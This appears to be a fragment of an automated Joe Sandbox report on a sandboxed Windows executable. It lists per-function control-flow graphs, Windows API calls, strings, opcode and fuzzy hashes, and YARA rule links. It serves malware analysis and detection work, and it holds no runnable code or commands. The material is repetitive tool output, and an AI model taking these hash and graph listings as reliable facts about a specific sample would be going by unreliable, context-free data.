                                                                                                                            control_flow_graph 579 408d43-408d4a 580 408d50-408d9a 579->580 581 4090fc-409123 579->581 582 408dbc 580->582 583 408d9c-408dba 580->583 584 409709-40971c 581->584 585 408dc6-408dcd 582->585 583->585 586 40973d-409755 584->586 587 40971e-40973b 584->587 588 408dd3-408e00 585->588 589 408fe5 585->589 590 409758-40975e 586->590 587->590 591 408e06-408e45 588->591 594 408fef-409018 589->594 592 409760-409766 590->592 593 40976b-409772 590->593 595 408e72-408e97 591->595 596 408e47-408e70 591->596 604 409b06 592->604 605 408a9f 592->605 600 4099a6-4099ab 593->600 601 409778-4097a4 593->601 598 40901a-40902d 594->598 599 40902f-409047 594->599 603 408e9d-408ea3 595->603 596->603 606 40904d-409053 598->606 599->606 602 4099b2-409b04 600->602 601->592 607 409b09-409b10 602->607 612 408ee2-408eee 603->612 613 408ea5-408eac 603->613 604->607 608 408cf5-408cfb 605->608 609 408aa6-408aad 605->609 610 408be7-408bed 605->610 611 408ce7-408cee 605->611 614 409055-40905c 606->614 615 40908e-409098 606->615 626 408d07-408d3e 608->626 609->602 617 408ab3-408ad1 609->617 616 408bf4-408c01 610->616 620 408cf0 611->620 621 408cab-408cd9 611->621 622 408ef4-408efe 612->622 623 408fae-408fb8 612->623 618 409962-409967 613->618 619 408eb2-408edc 613->619 624 409970-409975 614->624 625 409062-409088 614->625 615->594 627 40909e-4090a4 615->627 629 409954-409959 616->629 630 408c07-408c2c 616->630 617->604 632 408ad7-408b42 617->632 618->602 619->612 635 40995b-409960 620->635 633 408cdb-408ce1 621->633 634 408cfd 621->634 636 408f04-408f2d 622->636 637 408fca-408fe0 622->637 623->591 631 408fbe-408fc4 623->631 624->602 625->615 626->584 628 4090aa-4090b1 627->628 638 409977-40997c 628->638 639 4090b7-4096f4 628->639 629->602 629->635 630->616 640 408c2e-408c3a 630->640 631->637 641 408b44-408b4b 632->641 642 408b96-408ba9 632->642 633->611 634->626 635->602 643 408f8c-408fac 636->643 644 408f2f-408f3f 636->644 637->628 638->602 639->605 648 408c88-408ca9 640->648 649 408c3c-408c43 640->649 650 408b69-408b90 GlobalAlloc 641->650 651 408b4d-408b63 GlobalFree 641->651 645 408baf-408bb4 642->645 646 408f42-408f48 643->646 644->646 652 408bc1-408be1 645->652 653 408bb6-408bbf 645->653 646->622 654 408f4a-408f51 646->654 648->633 655 408c55-408c76 GlobalAlloc 649->655 656 408c45-408c54 GlobalFree 649->656 650->604 650->642 651->650 652->610 653->645 657 408f57-408f87 654->657 658 409969-40996e 654->658 655->604 659 408c7c-408c82 655->659 656->655 657->622 658->602 659->648
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394109436-0
                                                                                                                            • Opcode ID: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                            • Instruction ID: 73a589aadd6280c1d4df6f0517975a2c4eda39665482ce8a8b3e558a14f083aa
                                                                                                                            • Opcode Fuzzy Hash: cd7b7cc6089db85a917c869ea418fe9b4336126d354651c2af7450458f0d2819
                                                                                                                            • Instruction Fuzzy Hash: FD32CF75E04269CFEB64CF28C940BA9BBB2BB48300F1581EAD889B7381D7745E85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004093BF Relevance: 5.4, APIs: 4, Instructions: 399COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 660 4093bf-4093c6 661 409632 660->661 662 4093cc-409404 660->662 665 409638-409646 661->665 663 409436-40944f 662->663 664 409406-409431 662->664 667 409457-40945e 663->667 666 4094fb-409519 664->666 670 409993-40999d 665->670 671 40964c-409658 665->671 669 409527-409533 666->669 672 409460-409474 667->672 673 4094ca-4094f5 667->673 675 409624-409630 669->675 676 409539-409569 669->676 674 4099b2-409b04 670->674 677 409b06 671->677 678 40965e-40966b 671->678 679 409483-409489 672->679 680 409476-40947c 672->680 673->666 683 409b09-409b10 674->683 675->665 684 4095da-40961f 676->684 685 40956b-409588 676->685 677->683 686 409671-409678 678->686 681 409451 679->681 682 40948b-409492 679->682 680->679 681->667 687 409985-40998a 682->687 688 409498-4094c8 682->688 689 40958e-409594 684->689 685->689 690 40967e-4096ed 686->690 691 40999f-4099a4 686->691 687->674 688->681 692 409596-40959d 689->692 693 40951b-409521 689->693 690->686 694 4096ef-4096f4 690->694 691->674 696 4095a3-4095d5 692->696 697 40998c-409991 692->697 693->669 695 408a9f 694->695 698 408cf5-408cfb 695->698 699 408aa6-408aad 695->699 700 408be7-408bed 695->700 701 408ce7-408cee 695->701 696->693 697->674 706 408d07-40971c 698->706 699->674 703 408ab3-408ad1 699->703 702 408bf4-408c01 700->702 704 408cf0 701->704 705 408cab-408cd9 701->705 708 409954-409959 702->708 709 408c07-408c2c 702->709 703->677 710 408ad7-408b42 703->710 713 40995b-409960 704->713 711 408cdb-408ce1 705->711 712 408cfd 705->712 714 40973d-409755 706->714 715 40971e-40973b 706->715 708->674 708->713 709->702 716 408c2e-408c3a 709->716 717 408b44-408b4b 710->717 718 408b96-408ba9 710->718 711->701 712->706 713->674 720 409758-40975e 714->720 715->720 721 408c88-408ca9 716->721 722 408c3c-408c43 716->722 723 408b69-408b90 GlobalAlloc 717->723 724 408b4d-408b63 GlobalFree 717->724 719 408baf-408bb4 718->719 725 408bc1-408be1 719->725 726 408bb6-408bbf 719->726 727 409760-409766 720->727 728 40976b-409772 720->728 721->711 729 408c55-408c76 GlobalAlloc 722->729 730 408c45-408c54 GlobalFree 722->730 723->677 723->718 724->723 725->700 726->719 727->677 727->695 733 4099a6-4099ab 728->733 734 409778-4097a4 728->734 729->677 732 408c7c-408c82 729->732 730->729 732->721 733->674 734->727
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                            • Instruction ID: 2ff6cda69edbaac919d86c53bc6808f5f303a55c6bc0211467f0ef21a37139c8
                                                                                                                            • Opcode Fuzzy Hash: 96471980e818e90389b8f28b0725736ff68ec6d8f08f1ae4e00d8e9b25cb3d10
                                                                                                                            • Instruction Fuzzy Hash: A7229B74E05269CBEB64CF18C980BA9BBB2BB48300F1482EAD84DB7381D7345E85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040893D Relevance: 5.4, APIs: 4, Instructions: 351memoryCOMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 735 40893d-408965 736 409b09-409b10 735->736 737 40896b-408a94 735->737 738 408a96-408a99 737->738 739 409b06 738->739 740 408a9f 738->740 739->736 741 408cf5-408cfb 740->741 742 408aa6-408aad 740->742 743 408be7-408bed 740->743 744 408ce7-408cee 740->744 750 408d07-40971c 741->750 746 4099b2-409b04 742->746 747 408ab3-408ad1 742->747 745 408bf4-408c01 743->745 748 408cf0 744->748 749 408cab-408cd9 744->749 752 409954-409959 745->752 753 408c07-408c2c 745->753 746->736 747->739 754 408ad7-408b42 747->754 757 40995b-409960 748->757 755 408cdb-408ce1 749->755 756 408cfd 749->756 758 40973d-409755 750->758 759 40971e-40973b 750->759 752->746 752->757 753->745 760 408c2e-408c3a 753->760 761 408b44-408b4b 754->761 762 408b96-408ba9 754->762 755->744 756->750 757->746 764 409758-40975e 758->764 759->764 765 408c88-408ca9 760->765 766 408c3c-408c43 760->766 767 408b69-408b90 GlobalAlloc 761->767 768 408b4d-408b63 GlobalFree 761->768 763 408baf-408bb4 762->763 769 408bc1-408be1 763->769 770 408bb6-408bbf 763->770 771 409760-409766 764->771 772 40976b-409772 764->772 765->755 773 408c55-408c76 GlobalAlloc 766->773 774 408c45-408c54 GlobalFree 766->774 767->739 767->762 768->767 769->743 770->763 771->738 776 4099a6-4099ab 772->776 777 409778-4097a4 772->777 773->739 775 408c7c-408c82 773->775 774->773 775->765 776->746 777->771
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$AllocFree
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3394109436-0
                                                                                                                            • Opcode ID: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                            • Instruction ID: 196290a36a957acb70ae20b533fcf0c155bb910872d15f7e614b6225c37c67e6
                                                                                                                            • Opcode Fuzzy Hash: 40efa2268de9016f5e6645c0c9238ed231c7493705202486a25610001e8f553c
                                                                                                                            • Instruction Fuzzy Hash: 05026CB4D05268CFDBA4CF68C980B99BBF1BB48300F1082EAD959A7342D7349E85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401860 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                            • SetCurrentDirectoryA.KERNEL32(00000000,00000000), ref: 00401930
                                                                                                                              • Part of subcall function 004078A4: CharNextA.USER32 ref: 004078BE
                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 004018E0
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$AttributesCurrentDirectoryFile
                                                                                                                            • String ID: \
                                                                                                                            • API String ID: 15404496-2967466578
                                                                                                                            • Opcode ID: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                            • Instruction ID: b3c069ff8fe5fca2169c100ba5b4309268a8952e4838bd2cd3cdfa24001796cc
                                                                                                                            • Opcode Fuzzy Hash: d78038b2043e385ee061b609f29dc6a012e38869a8f0274da12750c867810de6
                                                                                                                            • Instruction Fuzzy Hash: E22196B19087419ED7107F2A8C4476ABBE8AF41314F15897FE4D5A33E1D63D4581CB2B
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040815B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00407CB6: lstrcpynA.KERNEL32(?,?,?,?,?,?,00404457), ref: 00407CD1
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(?,00000000,75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 0040794A
                                                                                                                              • Part of subcall function 00407935: CharNextA.USER32(75923160,?,00408184,?,?,?,00000000,?,004085CF), ref: 00407952
                                                                                                                            • lstrlenA.KERNEL32(?,00000000,?,?,?,00000000,?,004085CF), ref: 004081BE
                                                                                                                            • GetFileAttributesA.KERNEL32(00000000,?,?,00000000,?,?,?,00000000,?,004085CF), ref: 004081F7
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                            • String ID: C:\
                                                                                                                            • API String ID: 3248276644-3404278061
                                                                                                                            • Opcode ID: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                            • Instruction ID: a4b91be4712b2a5abe4fc9de88cdddcc6cd402f2cf4946f98fb9fcd9c72e04c7
                                                                                                                            • Opcode Fuzzy Hash: 2da7ec1753567bed1e155ededaacee0951334442434f81bdc17e756d419ccca8
                                                                                                                            • Instruction Fuzzy Hash: D6118FB0508314AAD710ABA69A4167A7BD89F05354F46447FECC0AA285CB3C5852866F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00403845 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 57windowCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend
                                                                                                                            • String ID: 0u
                                                                                                                            • API String ID: 3850602802-3203441087
                                                                                                                            • Opcode ID: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                            • Instruction ID: 587040a18b5e8d3ddabbac84dae9583a5ca4581ff6aa0f06bd791ecb2da4f76d
                                                                                                                            • Opcode Fuzzy Hash: 0f8c1266bbb926ccc1bd59e027622b1526ca312be5caf6883b3757b9e2fe7e12
                                                                                                                            • Instruction Fuzzy Hash: 2811B172A043009FC710BF29D88911BBFE8EB40351F50C67EF854A73A0E338D6058B99
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00407AD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CountFileNameTempTick
                                                                                                                            • String ID: nsa
                                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                                            • Opcode ID: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                            • Instruction ID: 856d399887dd27b7ff2090b6ba205bffd5fa5b63c1769944cd833ed7d7811f75
                                                                                                                            • Opcode Fuzzy Hash: b0a3207c486979766b199e0870a403b1f3979b7e2f67fc1e41fde7ae102ddd2e
                                                                                                                            • Instruction Fuzzy Hash: 2CF0C272E082049FCB10AF69D88879FBFB4EF84310F00843AE95497380D6749515CB97
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004097A6 Relevance: 5.3, APIs: 4, Instructions: 284COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                            • Instruction ID: 373024fc2fed516bdc636a623b7a3c01618f37309bfd328d060bf71c45cb50f6
                                                                                                                            • Opcode Fuzzy Hash: a578235fd7ef3aed2a2d552e65bc1af2bfd9bf356f91058c6dae311955d0e3a7
                                                                                                                            • Instruction Fuzzy Hash: 2FE18A75E05269CFEB64CF68C980B99BBB1BB48300F1081EAD84DA7381D774AE85CF55
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409302 Relevance: 5.3, APIs: 4, Instructions: 276COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000412000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000041E000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.000000000042A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000434000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613820459.0000000000437000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.0000000000438000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613941654.000000000043C000.00000008.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_21_2_400000_3cs4PKncIzTPVTZHP3GDsO8B.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                            • Instruction ID: a08f90893e9a4040dbcaa68aabc4f5c37fecb49a8b953bcbec771c1c1b16f75e
                                                                                                                            • Opcode Fuzzy Hash: 1580e02ebf7c4fca29966eb1b7433a0a3187ed73c579ff4eb24ab240cbf4b120
                                                                                                                            • Instruction Fuzzy Hash: D1E18974E05269CFEB64CF68C984BA9BBB1BB48300F1481EAD859B7381D7349E85CF15
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00409193 Relevance: 5.3, APIs: 4, Instructions: 274memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000015.00000002.2613767067.0000000000401000.00000020.00000001.01000000.00000011.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000015.00000002.2613749484.0000000000400000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613787241.000000000040A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                            • Associated: 00000015.00000002.2613802991.000000000040B000.00000002.00000001.01000000.00000011.sdmpDownload File
